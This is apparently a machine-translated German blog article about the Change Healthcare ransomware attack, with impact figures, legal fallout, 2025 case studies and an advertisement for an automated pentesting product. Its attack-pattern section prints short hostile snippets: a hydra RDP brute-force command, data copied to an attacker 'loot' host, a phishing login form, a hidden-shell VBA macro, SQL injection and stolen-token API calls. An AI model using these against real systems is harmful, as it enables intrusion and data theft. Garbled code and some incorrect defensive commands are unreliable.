The Change Healthcare Cyberattack Update Today: Eine Momentaufnahme der andauernden Krise
Der Cyberangriff auf Change Healthcare, der erstmals im Februar 2024 wird auch im Jahr 2025 und darüber hinaus die Cybersicherheit und den Betrieb im Gesundheitswesen beeinflussen. Der Angriff, der zunächst als bedeutender Ransomware-Vorfall angekündigt wurde, hat sich inzwischen als fast 193 Millionen Menschen betroffenund ist damit einer der größten je verzeichneten Angriffe auf Daten im Gesundheitswesen. Über den Datenverlust hinaus wurden durch den Angriff landesweit die Zahlungssysteme von Clearingstellen, die Bearbeitung von Apothekenanträgen und der Fluss klinischer Genehmigungen unterbrochen, wodurch sowohl systemische Schwachstellen als auch erhebliche operationelle Risiken im Gesundheitssektor aufgedeckt wurden.
Ein tiefer Einblick in die Geschehnisse und ihre Bedeutung
Auf 21. Februar 2024Change Healthcare - Teil der UnitedHealth Group und einer der größten Datenverarbeiter im Gesundheitswesen in den USA - entdeckte einen Ransomware-Angriff, der wichtige Systeme zur Bearbeitung von Ansprüchen, Überprüfung der Anspruchsberechtigung, Apothekendienste und mehr lahmlegte. gesundheitsplan.org Es handelte sich nicht um einen lokal begrenzten Verstoß, der ein Krankenhaus oder eine Praxis betraf: Veränderung der Infrastrukturprozesse von Healthcare 15 Milliarden Transaktionen im Gesundheitswesen jährlich und berührt einen erheblichen Teil aller Patienteninteraktionen in den Vereinigten Staaten. Amerikanische Krankenhausvereinigung
Der Angriff wurde der ALPHV/BlackCat Ransomware-Gruppedie große Teile der Infrastruktur von Change Healthcare verschlüsselte, was zu weitreichenden Ausfällen und Betriebsunterbrechungen führte. Zu einem bestimmten Zeitpunkt konnten Leistungserbringer keine elektronischen Anträge einreichen, Apotheken konnten Rezepte nicht über die Versicherung validieren, und viele Patienten waren gezwungen, aus eigener Tasche zu zahlen oder die Behandlung zu verschieben. gesundheitsplan.org
Anfängliche Schätzungen gingen davon aus, dass rund 100 Millionen Menschen von der Sicherheitslücke betroffen waren, aber bis 2025 wurde die endgültige Zahl auf rund 192,7 Millionen Betroffene-fast zwei Drittel der US-Bevölkerung.

Wie die Sicherheitslücke kritische Schwachstellen in der IT des Gesundheitswesens aufdeckte
Die Rolle von Change Healthcare als zentrales Clearinghaus hatte zur Folge, dass sich ein Ausfall seiner Systeme auf nahezu alle Ebenen des Gesundheitswesens auswirkte. Das ergab eine Umfrage der American Hospital Association (AHA):
- 74% der Krankenhäuser berichteten, dass die Patientenversorgung direkt beeinträchtigt wurde, einschließlich Verzögerungen bei medizinisch notwendigen Genehmigungen.
- 94% berichtete über finanzielle Auswirkungen aufgrund von Unterbrechungen des Arbeitsablaufs.
- 33% gaben an, dass mehr als die Hälfte ihrer Einnahmen gestört wurde.
- 60% Es dauerte zwischen zwei Wochen und drei Monaten, um den normalen Betrieb wiederherzustellen, sobald die Systeme wieder online waren. Amerikanische Krankenhausvereinigung
Diese Statistiken zeigen, dass es sich bei dem Angriff nicht einfach nur um eine Datenverletzung handelte, die Backend-Datenbanken betraf, sondern um eine eine operative Krise, die alle Bereiche der Gesundheitsversorgung und der Gesundheitsverwaltung betrifft.
Selbst Monate später haben kleinere Praxen mit nachgelagerten Effekten zu kämpfen, darunter verzögerte Erstattungen von Ansprüchen und Liquiditätsengpässe, die die Gehaltsabrechnung und Dienstleistungen gefährden. PYMNTS.com
Die Datenenthüllung: Was aufgenommen wurde und warum es wichtig ist
Sobald sie in die Systeme von Change Healthcare eingedrungen waren, konnten die Angreifer große Mengen an sensiblen Daten exfiltrieren. Nach Angaben des Unternehmens und externen Berichten zur Cybersicherheit:
- Geschützte Gesundheitsinformationen (PHI)Patienten-Diagnosen, Behandlungspläne, Medikamentenanamnese und Testergebnisse.
- Persönlich identifizierbare Informationen (PII)Namen, Adressen, Geburtsdaten, Sozialversicherungsnummern.
- Finanz- und Versicherungsdaten: Plan-IDs, Abrechnungscodes, Antragsdatensätze, Zahlungserfahrungen. Malwarebytes
Die Exfiltration solch detaillierter PHI und PII löst nicht nur gesetzliche Verpflichtungen gemäß HIPAA aus, sondern birgt auch langfristige Risiken wie Identitätsdiebstahl, medizinischen Betrug und den Missbrauch von Gesundheitsdaten auf Sekundärmärkten.
Bundesaufsichtsbehörden, einschließlich der HHS-Büro für Bürgerrechte (OCR)haben bekräftigt, dass die Verpflichtung zur Meldung von Sicherheitsverletzungen auch dann gilt, wenn Dritte im Namen der betroffenen Unternehmen bei der Kontaktaufnahme helfen.

Jüngste regulatorische und rechtliche Reaktionen
Die Sicherheitsverletzung hat nicht nur die Aufmerksamkeit von Bundesbehörden auf sich gezogen, sondern auch rechtliche Schritte ausgelöst. So wird in der Klage des Generalstaatsanwalts von Nebraska behauptet, dass Change Healthcare es versäumt hat, branchenübliche Sicherheitsvorkehrungen und eine Netzwerksegmentierung zu implementieren, was zu dem Ausmaß der Sicherheitsverletzung und dem lang anhaltenden Ausfall beigetragen hat. Das HIPAA-Journal
In der Zwischenzeit klärt HHS OCR weiterhin die Zuständigkeiten für Benachrichtigungen über Sicherheitsverletzungen gemäß den HIPAA-Vorschriften und betont die koordinierte Kommunikation zwischen Change Healthcare, den betroffenen Unternehmen und den Aufsichtsbehörden.
Auf bundespolitischer Ebene hat der Vorfall Diskussionen über die Stärkung der nationalen Standards für das Risikomanagement von Dritten im Gesundheitswesen ausgelöst, ein Thema, das nun in den Gesundheitssystemen und den gesetzgebenden Ausschüssen im Vordergrund steht.
Echte Angriffsmuster und beobachtete Ransomware-Techniken
Wenn man versteht, wie die Angreifer bei diesem Vorfall vorgegangen sind, können Verteidiger künftige Verteidigungsmaßnahmen entwickeln. Bei dem Einbruch bei Change Healthcare kamen Techniken zum Einsatz, die bei fortgeschrittenen Ransomware-Kampagnen üblich sind:
Angriffsmuster #1: Kompromittierter Fernzugriff
Viele große Sicherheitsverletzungen beginnen mit kompromittierten Fernzugangsportalen. Im Fall von Change Healthcare wurde öffentlich vor dem US-Senat ausgesagt, dass Citrix-Fernzugriff ohne Multi-Faktor-Authentifizierung (MFA) war ein Faktor für den ersten Netzzugang. Nixon Peabody LLP
Hier ist ein simuliertes Brute-Force-Beispiel (zu Lehrzwecken):
bash
#Educational brute force simulation against RDP porthydra -L users.txt -P rockyou.txt rdp://changehealthcare.example.com
Verteidigung: Setzen Sie eine Multi-Faktor-Authentifizierung durch und implementieren Sie Richtlinien zur Kontosperrung, um solche Versuche zu vereiteln.
powershell
Aktivieren von MFA (Windows) Set-UserMFAPreference -Identity "Admin" -Enabled $true
Angriffsmuster #2: Sammeln von Zugangsdaten über Phishing
Ransomware-Gruppen wechseln häufig von Phishing-Kampagnen zur internen Verteilung von Ransomware:
html
<input type="text" name="username">
<input type="password" name="password">
<input type="submit"></form>
Verteidigung: Setzen Sie E-Mail-Filter, Benutzerschulungen und Link-Verhaltensanalysen ein, um den ersten Zugriff zu verhindern.
Angriffsmuster #3: Doppelte Erpressung und Datenexfiltration
Diese moderne Technik verschlüsselt Systeme und droht gleichzeitig, gestohlene Daten zu veröffentlichen:
bash
Lehrreiche Simulation von Massendatenexfiltrationcp -r /SensitiveData angreifer@remotehost:/loot
Verteidigung: Verwenden Sie Tools zur Verhinderung von Datenverlusten (DLP) und zur Erkennung von Verschlüsselung während der Übertragung, um nicht autorisierte Übertragungen zu identifizieren und zu blockieren.
Angriffsmuster #4: Ransomware-Verschlüsselungsschleife
Einmal eingerichtet, kann Ransomware ganze Dateispeicher verschlüsseln:
powershell
Hypothetische Verschlüsselungsschleife (educational)Get-ChildItem -Path C:\\Data | ForEach-Object { Encrypt-File -Path $_.FullName -Key $key}
Die Isolierung kritischer Systeme und die Überwachung von Dateiänderungsmustern sind wichtige Schutzmaßnahmen.
Angriffsmuster #5: SQL-Injection in APIs zur Bearbeitung von Ansprüchen
Bei Ransomware- und Exfiltrationskampagnen suchen die Angreifer häufig nach unsichere Endpunkte in APIs von Anbietern im Gesundheitswesen. Ein hypothetisches Szenario, das Change Healthcare-ähnliche Endpunkte betrifft, könnte SQL-Injection beinhalten:
python
#Python Beispiel: Unsichere SQL-Abfrage (Bildung) import sqlite3 conn = sqlite3.connect('claims.db') cursor = conn.cursor() user_input = "1 OR 1=1" # Malicious inputquery = f "SELECT * FROM claims WHERE patient_id = {user_input};" cursor.execute(query)
Verteidigung: Verwenden Sie immer parametrisierte Abfragen, um Injektionen zu verhindern:
python
#Safe SQL querycursor.execute("SELECT * FROM claims WHERE patient_id = ?", (user_input,))
Damit wird verhindert, dass Angreifer über manipulierte Eingaben ganze Datenbanken abrufen können.
Angriffsmuster #6: Bösartiges Makro in medizinischen Abrechnungsdokumenten
Angreifer liefern Nutzlasten oft über Excel-Makros eingebettet in Abrechnungsdokumente, die an Anbieter gesendet werden:
vb
' Excel VBA-Makro (pädagogisch) Sub AutoOpen() Shell "powershell.exe -Command Start-Process cmd.exe", vbHideEnd Sub
Verteidigung: Deaktivieren Sie Makros standardmäßig und validieren Sie Dokumentquellen:
powershell
Makro-Sicherheitsrichtlinie erzwingen Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
Dadurch wird die Ausführung beliebiger Makros verhindert, während legitime, von vertrauenswürdigen Quellen signierte Skripte zugelassen werden.
Angriffsmuster #7: Diebstahl von API-Token und unbefugter Zugriff
Kompromittierte API-Tokens können Angreifern den Zugriff auf Patienten- oder Schadendaten ermöglichen:
bash
#Simulierter Token-Wiederverwendungs-Angriff (pädagogisch)curl -H "Authorization: Bearer stolen_token_here" <https://api.changehealthcare.example.com/claims>
Verteidigung: Wechseln Sie die API-Schlüssel häufig, erzwingen Sie OAuth mit Geltungsbereichen und überwachen Sie abnormale API-Anfragen:
python
#Token-Validierungs-Pseudocode
wenn nicht verify_token(token) oder token.is_revoked:
raise UnauthorizedError("Ungültiges oder widerrufenes Token")
2025 Cyberangriffe im Gesundheitswesen: Real-World Cases Beyond Change Healthcare
Change Healthcare bleibt zwar der folgenreichste Cybervorfall im Gesundheitswesen der letzten Jahre, 2025 hat bereits mehrere reale Angriffe hervorgebracht, die die gleichen strukturellen Schwächen aufweisenZentralisierte Plattformen, schwache Identitätskontrollen, zu vertrauenswürdige APIs und verzögerte Erkennung.
Diese Fälle sind wichtig, weil sie zeigen, dass die Angriffsmuster hinter Change Healthcare waren nicht isoliertsondern Teil eines breiteren und sich beschleunigenden Trends.
Fall 1 (2025): Ransomware über gestohlene VPN-Anmeldeinformationen in einem regionalen Gesundheitsnetzwerk
Anfang 2025 deckte ein regionales Gesundheitsnetzwerk aus mehreren Bundesstaaten einen Ransomware-Angriff auf, der auf gestohlene VPN-Zugangsdaten, die von einer Verletzung eines Drittanbieters wiederverwendet wurden. Die Angreifer meldeten sich auf legitime Weise an und umgingen die Schutzmechanismen vollständig. Anschließend verbrachten sie fast zwei Wochen mit der internen Erkundung, bevor sie die Ransomware einsetzten.
Dieser Vorfall ähnelt stark dem Zugriffsmuster von Change Healthcare: kein Zero-Day-Exploit, keine exotische Malware - nur Missbrauch von Zugangsdaten in Verbindung mit unzureichender Zugangssegmentierung.
Beobachtetes Angriffsverhalten (vereinfachte Simulation):
bash
1TP5Legaler VPN-Zugang mit kompromittierten Anmeldedatenopenvpn --config corp-vpn.ovpn --auth-user-pass stolen_creds.txt
Nach dem Eindringen zählten die Angreifer die internen Dienste auf:
bash
nmap -sT 10.10.0.0/16
2025 Lektion in Verteidigung: Unternehmen, die sich auf VPN-Zugang verlassen, müssen Anmeldedaten als verletzbar durch Verzug. Bedingter Zugriff, MFA-Erzwingung, Geräteüberprüfung und kontinuierliche Sitzungsüberprüfung sind jetzt ein Muss - und keine optionale Härtung.
Fall 2 (2025): API-Missbrauch in einer Clearinghouse-Integration im Gesundheitswesen
Ein weiterer Fall aus dem Jahr 2025 betraf eine Abrechnungsplattform für das Gesundheitswesen, bei der Angreifer die überprivilegierte API-Tokens für den Abgleich von Forderungen verwendet. Die Verschlüsselung wurde nicht gebrochen. Stattdessen wurden Token, die für den "Nur-Lese-Abgleich" ausgestellt wurden, stillschweigend wiederverwendet, um große Mengen von PHI zu extrahieren.
Diese Art von Fehlern ist besonders relevant für Change Healthcare, wo API-Vertrauensbeziehungen zwischen Anbietern, Kostenträgern und Clearingstellen sind umfassend und langlebig.
Beobachtetes Missbrauchsmuster (Bildung):
curl -H "Authorization: Bearer valid_but_overprivileged_token" \\ <https://api.billing.example.com/v1/claims?from=2023>
Da das Token gültig war, haben die Protokollierungssysteme die Aktivität erst dann erkannt, als ungewöhnliche Volumenmuster auftraten.
Defensive Kontrolle wird ab 2025 zunehmend angenommen:
python
#Enforcing scoped access and volume limits if request.scope not in ["claims:read:self"]: deny() if request.rate > baseline_rate: trigger_alert()
2025 Lektion in Verteidigung: APIs im Gesundheitswesen müssen sich Bereiche mit den geringsten Rechten, kurzlebige Token und verhaltensbedingte Raten-Baselines. Statische API-Schlüssel ohne Telemetrie sind nicht mehr vertretbar.
Fall 3 (2025): Ausnutzung der Lieferkette durch medizinische Software-Updates
Mitte 2025 gab ein SaaS-Anbieter im Gesundheitswesen bekannt, dass Angreifer bösartige Logik in eine CI/CD-Pipeline-Abhängigkeitdie dann im Rahmen von Routine-Updates in die nachgelagerten Provider-Umgebungen eingespielt wurde.
In diesem Fall ging es zunächst nicht um Ransomware. Stattdessen konzentrierten sich die Angreifer auf stiller Datenzugriff und Auslesen von Anmeldeinformationenund verzögert die Entdeckung um Monate.
Vereinfachtes Angriffsmuster in der Lieferkette:
bash
#MSchädliche Abhängigkeit eingeführt upstreamnpm install analytics-helper@latest
Nach der Bereitstellung leitete der bösartige Code unbemerkt Umgebungsgeheimnisse weiter.
Moderne 2025 defensive Reaktion:
bash
#Enforcing dependency integritynpm audit cosign verify --key trusted.pub container-image
2025 Lektion in Verteidigung: Anbieter von Gesundheitsdienstleistungen müssen die Sicherheit der Software-Lieferkette als Infrastruktur für die Patientensicherheit. SBOMs, Signierung von Abhängigkeiten und Pipeline-Monitoring sind jetzt regulatorische Erwartungen, keine experimentellen Praktiken.
Fall 4 (2025): KI-gestütztes Phishing für Finanzteams im Gesundheitswesen
Ein bemerkenswerter Trend im Jahr 2025 ist der Anstieg der KI-generierte Phishing-E-Mails, die auf Mitarbeiter des Finanz- und Ertragszyklus im Gesundheitswesen zugeschnitten sind. Im Gegensatz zu früheren Phishing-Kampagnen entsprachen diese Nachrichten genau der internen Terminologie, den Abrechnungszyklen und sogar den spezifischen Arbeitsabläufen der Zahler.
Mehrere Organisationen des Gesundheitswesens berichteten, dass Angreifer diese E-Mails nutzten, um Sammeln von Berechtigungsnachweisen für SchadenbearbeitungssystemeSie werden später durch den Weiterverkauf von Daten und nicht durch unmittelbare Ransomware zu Geld gemacht.
Vereinfachtes Beispiel einer Phishing-Nutzlast (für Bildungszwecke):
html
<form action="/internal/billing-review">
<input name="username">
<input name="password"></form>
Defensive Kontrolle gewinnt im Jahr 2025 an Bedeutung:
bash
#BVerhaltensanalyse von E-Mails (konzeptionell) wenn email.semantic_similarity > threshold und sender_untrusted: quarantine()
2025 Lektion in Verteidigung: Die statische Phishing-Erkennung reicht nicht mehr aus. Organisationen im Gesundheitswesen müssen Folgendes kombinieren Analyse des Nutzerverhaltens, semantische Analyse und kontinuierliche Risikobewertung von Anmeldedaten.
Betrieb und finanzielle Auswirkungen auf Gesundheitsdienstleister
Für viele Kliniken und Krankenhäuser war die Sicherheitsverletzung nicht nur ein Cybersecurity-Ereignis, sondern auch eine finanzielle Krise. Ohne Zugang zu elektronischen Abrechnungssystemen waren die Anbieter gezwungen, auf manuelle Prozesse oder Umgehungslösungen zurückzugreifen, was zu Verzögerungen bei den Erstattungen führte und den Cashflow belastete. PYMNTS.com
In Bundesstaaten wie Massachusetts haben Erhebungen ergeben, dass täglich finanzielle Verluste in Millionenhöhe zu verzeichnen sind, da die Organisationen darum kämpfen, sich mit verzögerten Einnahmequellen über Wasser zu halten. Reddit
Hilfsmaßnahmen des Bundes, einschließlich Medicare-Vorauszahlungen an die vom Stromausfall betroffenen Anbieter wurden eingeführt, um das finanzielle Defizit auszugleichen, obwohl es sich dabei um vorübergehende Maßnahmen handelt, die im Laufe der Zeit zurückgezahlt werden müssen. cmadocs.org
Warum der Angriff auf das Gesundheitswesen auch im Jahr 2025 noch Bestand hat
Mehr als ein Jahr nach dem ersten Vorfall betrachten Führungskräfte des Gesundheitswesens und Cybersicherheitsexperten die Sicherheitslücke bei Change Healthcare als ein bahnbrechendes Ereignis, das strukturelle Schwächen in der Art und Weise aufgedeckt hat, wie IT-Anbieter im Gesundheitswesen klinische Abläufe und die Datenverarbeitung unterstützen. Amerikanische Krankenhausvereinigung
Kritisch, Risiken der Anbieterkonzentration-wo ein einziger Drittanbieter einen Großteil der Arbeitsabläufe berührt- bedeutete, dass ein einziger Verstoß weitreichende Folgen für die gesamte Branche hatte. Amerikanische Krankenhausvereinigung
Penligent.ai: Ein modernes Tool für automatisierte Penetrationstests und Resilienztests
Angesichts dieser systemischen Bedrohungen erforschen die Unternehmen Plattformen für automatisierte Penetrationstests um die traditionellen Sicherheitsverfahren zu ergänzen. Penligent.ai ist eine solche Plattform, die KI-gestützte Erkundung, Fuzzing und die Generierung von Exploit-Szenarien integriert, um Sicherheitsteams dabei zu helfen, versteckte Schwachstellen zu entdecken und Abhilfemaßnahmen zu validieren, bevor Angreifer sie ausnutzen können.
Penligent.aiDie Fähigkeiten der Firma umfassen:
- Automatisiertes Surface Mapping und Protokoll-Fuzzing für APIs und Altsysteme.
- Intelligente Priorisierung von Schwachstellen auf der Grundlage realer Bedrohungsmodelle.
- Integration mit SIEM/EDR zur Kreuzkorrelation von Ergebnissen und zur Erkennung von Mustern in großem Umfang.
Durch die Simulation von Angriffsvektoren, die denjenigen ähneln, die bei der Sicherheitsverletzung bei Change Healthcare zum Einsatz kamen - wie etwa Schwachstellen beim Fernzugriff oder Exfiltrationskanäle - können Sicherheitsteams stärkere Abwehrmechanismen aufbauen und die Wahrscheinlichkeit einer katastrophalen Kompromittierung durch Dritte verringern.
In der Praxis verwenden die Organisationen Penligent.ai haben die Zyklen von Penetrationstests beschleunigt und Bedingungen aufgedeckt, die andernfalls unentdeckt geblieben wären, bis es zu einem echten Einbruch kam.
Gelernte Lektionen und zukünftige Richtungen
Bei den Überlegungen der Verantwortlichen für Cybersicherheit zu dieser Sicherheitsverletzung tauchen mehrere Themen auf:
- Null Vertrauen muss Standard werden: Die traditionelle Perimeterverteidigung ist unzureichend. Eine identitätsorientierte Verteidigung reduziert die seitliche Bewegung.
- Das Risikomanagement von Anbietern ist reformbedürftig: Die Abhängigkeit von einer einzigen Clearingstelle ohne Redundanz erwies sich als kostspielig.
- Cyber-Hygiene kann nicht optional sein: Grundlegende Schritte wie MFA, Patching und Segmentierung schützen vor vielen Angriffspfaden.
Redaktionelle Anmerkung von Branchenanalysten: "Was früher als 'IT-Ausfall' bezeichnet wurde, wird heute eindeutig als eine einsatzkritisches Ereignis für die nationale Infrastruktur. Der Gesundheitssektor muss Cybersicherheit als Kernstück der Patientensicherheit behandeln, nicht als zusätzliche Schreibarbeit."
Schlussfolgerung: Was die heutige Aktualisierung für das Gesundheitswesen bedeutet
Das heutige Update zu den Cyberangriffen im Gesundheitswesen ist nicht nur ein Statusbericht, sondern spiegelt die Entwicklung der Cyberrisiken in einer stark vernetzten und datenintensiven Branche wider. Mit fast 193 Millionen Menschen betroffenDiese Sicherheitsverletzung wird noch jahrelang als abschreckendes Beispiel und als Katalysator für bessere Sicherheitspraktiken im Gesundheitswesen gelten.
Für Sicherheitsexperten, Betriebsleiter und politische Entscheidungsträger bedeutet der Weg in die Zukunft, dass sie verstärkt in die Automatisierung der Verteidigung, eine strenge Überwachung der Anbieter und robuste Architekturen investieren müssen, die den Bedrohungen von morgen standhalten können.
Autorität & Referenz-Links
- Ändern Sie Healthcare Official FAQ (HHS OCR): https://www.hhs.gov/hipaa/for-professionals/special-topics/change-healthcare-cybersecurity-incident-frequently-asked-questions/index.html
- AHA Cybersecurity Auswirkungen und Reaktionen: https://www.aha.org/change-healthcare-cyberattack-underscores-urgent-need-strengthen-cyber-preparedness-individual-health-care-organizations-and
- Gesundheits-IT-Nachrichten auf Breach-Skala: https://www.healthcareitnews.com/news/new-numbers-change-healthcare-data-breach-193-million-affected

